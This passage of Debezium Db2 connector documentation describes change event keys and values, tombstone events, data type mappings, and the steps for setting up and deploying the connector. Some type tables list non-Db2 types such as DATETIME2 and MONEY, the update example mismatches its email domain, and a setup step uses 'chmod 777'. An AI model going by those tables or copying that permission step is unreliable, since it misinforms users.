for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. +\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, note that the `EMAIL` value is `john.doe@example.com`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.com`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-db2-connectors-map-data-types\n\/\/ Title: How {prodname} Db2 connectors map data types\n[[db2-data-types]]\n== Data type mappings\n\nDb2's data types are described in https:\/\/www.ibm.com\/support\/knowledgecenter\/en\/SSEPGG_11.5.0\/com.ibm.db2.luw.sql.ref.doc\/doc\/r0008483.html[Db2 SQL Data Types].\n\nThe Db2 connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Db2 data type of the column. This section describes these mappings.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:db2-basic-types[]\n* xref:db2-temporal-types[]\n* xref:db2-timestamp-types[]\n* xref:db2-decimal-types[]\n\nendif::product[]\n\n[id=\"db2-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps each of the Db2 data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Db2 basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type \n|Literal type (schema type) \n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|Only snapshots can be taken from tables with BOOLEAN type columns. Currently SQL Replication on Db2 does not support BOOLEAN, so Debezium can not perform CDC on those tables. Consider using a different type.\n\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`BINARY`\n|`BYTES`\n|n\/a\n\n|`BLOB`\n|`BYTES`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`CLOB`\n|`STRING`\n|n\/a\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nString representation of a timestamp without timezone information\n\n|`DECFLOAT`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DECIMAL`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n\n|`DBCLOB`\n|`STRING`\n|n\/a\n\n|`DOUBLE`\n|`FLOAT64`\n|n\/a\n\n|`INTEGER`\n|`INT32`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`TIME`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nString representation of a time without timezone information\n\n|`TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nString representation of a timestamp without timezone information\n\n|`VARBINARY`\n|`BYTES`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARGRAPHIC`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nString representation of an XML document\n|===\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema. Change events contain the field's default value unless an explicit column value had been given. Consequently, there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value helps satisfy compatibility rules when {link-prefix}:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[db2-temporal-types]]\n=== Temporal types\n\nOther than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[db2-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n|===\n\n[[db2-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports tenth of a microsecond precision, the events generated by a connector with the `connect` time precision *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n|===\n\n[[db2-timestamp-types]]\n=== Timestamp types\n\nThe `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n[[db2-decimal-types]]\n=== Decimal types\n\n[cols=\"27%a,18%a,55%a\",options=\"header\"]\n|===\n|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`SMALLMONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point iss shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n\n|`MONEY`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.\nThe `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-db2-to-run-a-debezium-connector\n\/\/ Title: Setting up Db2 to run a {prodname} connector\n[[setting-up-db2]]\n== Set up\n\nA database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.\n\nThis procedure assumes that you are logged in as the `db2instl` user, which is the default instance and user name when using the Db2 docker container image.\n\n.Prerequisites\n\n* On the machine on which Db2 is running, the content in `debezium-connector-db2\/src\/test\/docker\/db2-cdc-docker` is available in the `$HOME\/asncdctools\/src` directory.\n\n.Procedure\n\n. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`\ncommand provided with Db2:\n+\n[source,shell]\n----\ncd $HOME\/asncdctools\/src\n----\n+\n[source,shell]\n----\n.\/bldrtn asncdc\n----\n\n. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.\n+\n[source,shell]\n----\ndb2 start db DB_NAME\n----\n\n. Ensure that JDBC can read the Db2 metadata catalog:\n+\n[source,shell]\n----\ncd $HOME\/sqllib\/bnd\n----\n+\n[source,shell]\n----\ndb2 bind db2schema.bnd blocking all grant public sqlerror continue\n----\n\n. Ensure that the database was recently backed-up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `dev\/null` for the backup location.\n\n.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:\n+\n[source,shell]\n----\ndb2 backup db DB_NAME to BACK_UP_LOCATION\n----\n\n.. Restart the database:\n+\n[source,shell]\n----\ndb2 restart db DB_NAME\n----\n\n. Connect to the database to install the {prodname} management UDFs. It is assumed that you are logged in as the `db2instl` user so the UDFs should be installed on the `db2inst1` user.\n+\n[source,shell]\n----\ndb2 connect to DB_NAME\n----\n\n. Copy the {prodname} management UDFs and set permissions for them:\n+\n[source,shell]\n----\ncp $HOME\/asncdctools\/src\/asncdc $HOME\/sqllib\/function\n----\n+\n[source,shell]\n----\nchmod 777 $HOME\/sqllib\/function\n----\n\n. Enable the {prodname} UDF that starts and stops the ASN capture agent:\n+\n[source,shell]\n----\ndb2 -tvmf $HOME\/asncdctools\/src\/asncdc_UDF.sql\n----\n\n. Create the ASN control tables:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdctables.sql\n----\n\n. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:\n+\n[source,shell]\n----\n$ db2 -tvmf $HOME\/asncdctools\/src\/asncdcaddremove.sql\n----\n+\nAfter you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n. Start the ASN agent:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('start','asncdc');\n----\n\n. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture. Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:\n+\n[source,sql]\n----\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n----\n\n. Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* 